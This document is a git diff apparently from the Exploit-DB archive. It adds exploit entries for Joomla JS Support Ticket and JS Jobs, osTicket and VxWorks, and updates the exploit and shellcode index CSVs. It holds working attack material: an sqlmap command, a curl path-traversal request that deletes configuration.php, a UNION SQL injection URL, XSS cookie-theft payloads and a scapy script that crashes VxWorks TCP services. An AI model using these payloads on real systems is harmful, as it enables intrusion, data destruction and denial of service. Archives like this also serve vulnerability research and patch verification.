+$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'
\ No newline at end of file
diff --git a/exploits/php/webapps/47223.txt b/exploits/php/webapps/47223.txt
new file mode 100644
index 000000000..b6b4f71cc
--- /dev/null
+++ b/exploits/php/webapps/47223.txt
@@ -0,0 +1,64 @@
+#Exploit Title: Joomla! component com_jssupportticket - Authenticated Arbitrary File Deletion
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 10.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.6
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+This vulnerability is caused when processing custom user field.
+
+file:	admin/models/ticket.php
+function:	storeTicket
+
+    54	    function storeTicket($data){
+    ...snip...
+    75	        $userfield = $this->getJSModel('userfields')->getUserfieldsfor(1);
+    76	        $params = array();
+    77		foreach ($userfield AS $ufobj) {
+    78				$vardata = '';
+    ...snip...
+   121			if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
+   122	                $customflagfordelete = true;
+   123			$custom_field_namesfordelete[]= $data[$ufobj->field.'_2'];	//no check.
+   	...snip...
+   198	        if($customflagfordelete == true){
+   199			foreach ($custom_field_namesfordelete as $key) {
+   200	                $res = $this->removeFileCustom($ticketid,$key);	//!!!
+   201	            }
+   202	        }
+   ...snip...
+  1508	    function removeFileCustom($id, $key){
+  1509	        $filename = str_replace(' ', '_', $key);
+  1510	
+  1511	        if(! is_numeric($id))
+  1512	            return;
+  1513	
+  1514	        $db = JFactory::getDbo();
+  1515	        $config = $this->getJSModel('config')->getConfigByFor('default');
+  1516	        $datadirectory = $config['data_directory'];
+  1517	
+  1518	        $base = JPATH_BASE;
+  1519	        if(JFactory::getApplication()->isAdmin()){
+  1520	            $base = substr($base, 0, strlen($base) - 14); //remove administrator    
+  1521	        }
+  1522	
+  1523	        $path = $base . '/' . $datadirectory. '/attachmentdata/ticket';
+  1524	
+  1525	        $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
+  1526	        $db->setQuery($query);
+  1527	        $foldername = $db->loadResult();
+  1528	        $userpath = $path . '/' . $foldername.'/'.$filename;
+  1529	        unlink($userpath);	//!!!
+  1530	        return;
+  1531	    }
+
+#####################################
+#PoC:
+#####################################
+When administrator has added custom user field as "19", attacker are can trigger this vulnerability by send a following request.
+
+$> curl -X POST -i -F 'option=com_jssupportticket' -F 'c=ticket' -F 'task=saveTicket' -F '{VALID_FORMTOKEN_FROM_FORMTICKET}=1' -F 'Itemid=666' -F 'id=' -F 'message=woot' -F '19_1=1' -F '19_2=../../../../configuration.php' -F 'filename[]=@./woot.txt' -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' 'http://localhost/index.php'
\ No newline at end of file
diff --git a/exploits/php/webapps/47224.txt b/exploits/php/webapps/47224.txt
new file mode 100644
index 000000000..bb80126ba
--- /dev/null
+++ b/exploits/php/webapps/47224.txt
@@ -0,0 +1,55 @@
+# Exploit Title: osTicket-v1.12 Stored XSS via File Upload
+# Vendor Homepage: https://osticket.com/
+# Software Link: https://osticket.com/download/
+# Exploit Author: Aishwarya Iyer
+# Contact: https://twitter.com/aish_9524
+# Website: https://about.me/aish_iyer
+# Category: webapps
+# CVE: CVE-2019-14748
+
+1. Description
+
+An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
+The Ticket creation form allows users to upload files along with queries.
+It was found that the file-upload functionality has fewer (or no)
+mitigations implemented for file content checks; also, the output is not
+handled properly, causing persistent XSS that leads to cookie stealing or
+malicious actions. For
+example, a non-agent user can upload a .html file, and Content-Disposition
+will be set to inline instead of an attachment.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14748
+
+2. Proof of Concept
+
+Steps to Reproduce:
+- Login to the portal as a non agent user:
+- Open a New Ticket
+- Select  any option from the dropdown menu present under "Help Topic"
+- Text box appears, enter details accordingly
+- In the section "drop files here or choose them", we would be putting our
+payload
+- Open any text editor  and name the file as test(say) with .html extension.
+- Within the file, enter the payload
+<script>alert(document.cookie);</script>
+- Save the test.html file.
+- Now click on drop files here option and enter the test.html file.
+- Click on "create ticket" option
+- Login with another user(agent)
+- Now within the User Directory, go to the user under which the payload has
+been put.
+- The ticket raised with the name mentioned will be shown under the subject
+category.
+- Scroll down and the file uploaded will be present below.
+- Click on the file, and the payload gets executed which is persistent
+
+3. Reference
+
+https://github.com/osTicket/osTicket/commit/33ed106b1602f559a660a69f931a9d873685d1ba
+https://github.com/osTicket/osTicket/releases/tag/v1.12.1
+https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+
+4. Solution
+
+The vulnerability has been patched by the vendor in the next release which
+is osTicket v1.10.7.
\ No newline at end of file
diff --git a/exploits/php/webapps/47225.txt b/exploits/php/webapps/47225.txt
new file mode 100644
index 000000000..6cd8c9129
--- /dev/null
+++ b/exploits/php/webapps/47225.txt
@@ -0,0 +1,51 @@
+# Exploit Title: osTicket-v1.12 Formula Injection
+# Vendor Homepage: https://osticket.com/
+# Software Link: https://osticket.com/download/
+# Exploit Author: Aishwarya Iyer
+# Contact: https://twitter.com/aish_9524
+# Website: https://about.me/aish_iyer
+# Category: webapps
+# CVE: CVE-2019-14749
+
+1. Description
+
+
+An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
+CSV (aka Formula) injection exists in the export spreadsheets
+functionality. These spreadsheets are generated dynamically from
+unvalidated or unfiltered user input in the Name and Internal Notes fields
+in the Users tab, and the Issue Summary field in the tickets tab. This
+allows other agents to download data in a .csv file format or .xls file
+format. This is used as input for spreadsheet applications such as Excel
+and OpenOffice Calc, resulting in a situation where cells in the
+spreadsheets can contain input from an untrusted source. As a result, the
+end user who is accessing the exported spreadsheet can be affected.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14749
+
+2. Proof of Concept
+
+Steps to Reproduce:
+- Login as an agent and under the "Users" section create a new user.
+- Insert the crafted payload of Formula Injection into "Name" and "Internal
+Notes" field.
+- Login as another agent and under the Users tab, click on export and then
+save the ".csv" file.
+- It is observed that the payload gets executed in excel and this leads to
+remote code execution.
+- Not just an agent, even a non-agent user has the option to edit his name
+where he can insert the malicious payload of Formula Injection.
+- The application does not sanitize the inputs here due to which when the
+agent clicks on export the payload gets executed.
+-The same issue persisted in the "Issue Summary" field in the tickets tab.
+
+3. Reference
+
+https://github.com/osTicket/osTicket/commit/99818486c5b1d8aa445cee232825418d6834f249
+https://github.com/osTicket/osTicket/releases/tag/v1.12.1
+https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+
+4. Solution
+
+The vulnerability has been patched by the vendor in the next release which
+is osTicket v1.10.7.
\ No newline at end of file
diff --git a/exploits/php/webapps/47226.txt b/exploits/php/webapps/47226.txt
new file mode 100644
index 000000000..0ea48b52d
--- /dev/null
+++ b/exploits/php/webapps/47226.txt
@@ -0,0 +1,42 @@
+# Exploit Title: osTicket-v1.12 Stored XSS
+# Vendor Homepage: https://osticket.com/
+# Software Link: https://osticket.com/download/
+# Exploit Author: Aishwarya Iyer
+# Contact: https://twitter.com/aish_9524
+# Website: https://about.me/aish_iyer
+# Category: webapps
+# CVE: CVE-2019-14750
+
+1. Description
+
+An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
+Stored XSS exists in setup/install.php. It was observed that no input
+sanitization was provided in the firstname and lastname fields of the
+application. The insertion of malicious queries in those fields leads to
+the execution of those queries. This can further lead to cookie stealing or
+other malicious actions.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14750
+
+2. Proof of Concept
+
+Steps to Reproduce:
+- While setting up the osTicket application in the setup/install.php page
+insert the XSS payload into the first name and last name field.
+- After filling in all the other details and clicking on 'continue', it is
+observed that there is no validation for the first name and last name field
+and the malicious payload is stored and a new agent is created.
+- Login as that agent and navigate to "agents" tab where we will find the
+inserted payload in the firstname and Lastname field.
+- Click on the firstname value and see the payload gets executed
+
+3. Reference
+
+https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12
+https://github.com/osTicket/osTicket/releases/tag/v1.12.1
+https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+
+4. Solution
+
+The vulnerability has been patched by the vendor in the next release which
+is osTicket v1.10.7.
\ No newline at end of file
diff --git a/exploits/php/webapps/47232.txt b/exploits/php/webapps/47232.txt
new file mode 100644
index 000000000..024465199
--- /dev/null
+++ b/exploits/php/webapps/47232.txt
@@ -0,0 +1,40 @@
+#Exploit Title: Joomla! component com_jsjobs - SQL Injection
+#Dork: inurl:"index.php?option=com_jsjobs"
+#Date: 11.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/5/download/1
+#Version: 1.2.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 296 in file site/models/cities.php
+
+   291	    function isCityExist($countryid, $stateid, $cityname){
+   292	        if (!is_numeric($countryid))
+   293	            return false;
+   294	
+   295	        $db = $this->getDBO();
+   296		$query = "SELECT id,name,latitude,longitude FROM `#__js_job_cities` WHERE countryid=" . $countryid . " AND LOWER(name) = '" . strtolower($cityname) . "'";	//!!!
+   297	
+   298	        if($stateid > 0){
+   299	            $query .= " AND stateid=".$stateid;
+   300	        }else{
+   301	            $query .= " AND (stateid=0 OR stateid IS NULL)";
+   302		}
+   303		
+   305	        $db->setQuery($query);
+   306	        $city = $db->loadObject();
+   307	        if ($city != null)
+   308	            return $city;
+   309	        else
+   310	            return false;
+   311	    }
+   312	
+   313	}
+
+#####################################
+#PoC:
+#####################################
+http://localhost/index.php?option=com_jsjobs&task=cities.savecity&citydata=%27%20UNION%20SELECT%20*%20FROM%20(SELECT%20user())%20AS%20a%20JOIN%20(SELECT%20version())%20as%20b%20JOIN%20(SELECT%20database())%20as%20c%20JOIN%20(SELECT%20%27woot%27)%20as%20d--%20,Canada
\ No newline at end of file
diff --git a/exploits/vxworks/dos/47233.py b/exploits/vxworks/dos/47233.py
new file mode 100755
index 000000000..2c167edc2
--- /dev/null
+++ b/exploits/vxworks/dos/47233.py
@@ -0,0 +1,28 @@
+# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
+# Discovered By: Armis Security
+# PoC Author: Zhou Yu (twitter: @504137480)
+# Vendor Homepage: https://www.windriver.com
+# Tested on: VxWorks 6.8
+# CVE: CVE-2019-12255
+# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
+# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
+
+from scapy.all import *
+
+if __name__ == "__main__":
+    ip = "192.168.10.199"
+    dport = 23
+    seq_num = 1000
+    payload = "\x42"*2000
+    sport = random.randint(1024,65535)
+
+    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
+    syn_ack = sr1(syn)
+
+    seq_num = seq_num + 1
+    ack_num = syn_ack.seq+1
+    ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
+    send(ack)
+
+    psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
+    send(psh)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7dd85753f..64afad563 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6522,6 +6522,9 @@ id,file,description,date,author,type,platform,port
 47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
 47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
 47211,exploits/multiple/dos/47211.html,"Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability",2019-08-07,"Google Security Research",dos,multiple,
+47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
+47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
+47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10627,6 +10630,7 @@ id,file,description,date,author,type,platform,port
 47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
+47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17595,6 +17599,10 @@ id,file,description,date,author,type,platform,port
 47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows,
 47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple,
 47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80
+47227,exploits/multiple/remote/47227.rb,"ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
+47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
+47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
+47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41586,3 +41594,12 @@ id,file,description,date,author,type,platform,port
 47216,exploits/php/webapps/47216.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download",2019-08-08,qw3rTyTy,webapps,php,80
 47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80
 47218,exploits/php/webapps/47218.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection",2019-08-08,qw3rTyTy,webapps,php,80
+47219,exploits/php/webapps/47219.txt,"BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting",2019-08-12,"Angelo Ruwantha",webapps,php,80
+47220,exploits/hardware/webapps/47220.rb,"Cisco Adaptive Security Appliance - Path Traversal (Metasploit)",2019-08-12,"Angelo Ruwantha",webapps,hardware,443
+47221,exploits/php/webapps/47221.txt,"UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting",2019-08-12,Greg.Priest,webapps,php,80
+47222,exploits/php/webapps/47222.txt,"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
+47223,exploits/php/webapps/47223.txt,"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion",2019-08-12,qw3rTyTy,webapps,php,80
+47224,exploits/php/webapps/47224.txt,"osTicket 1.12 - Persistent Cross-Site Scripting via File Upload",2019-08-12,"Aishwarya Iyer",webapps,php,80
+47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
+47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
+47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index dfd117767..952e28d54 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -533,19 +533,19 @@ id,file,description,date,author,type,platform
 38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
 38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
 39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
-39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
+39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,Sathishshan,shellcode,linux_x86-64
 39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
-39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
+39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,Sathishshan,shellcode,linux_x86-64
+39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,Sathishshan,shellcode,linux_x86-64
 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
+39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,Sathishshan,shellcode,linux_x86-64
 39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
-39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
-39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
+39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,Sathishshan,shellcode,linux_x86-64
+39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
-39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
+39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
 39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
 39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64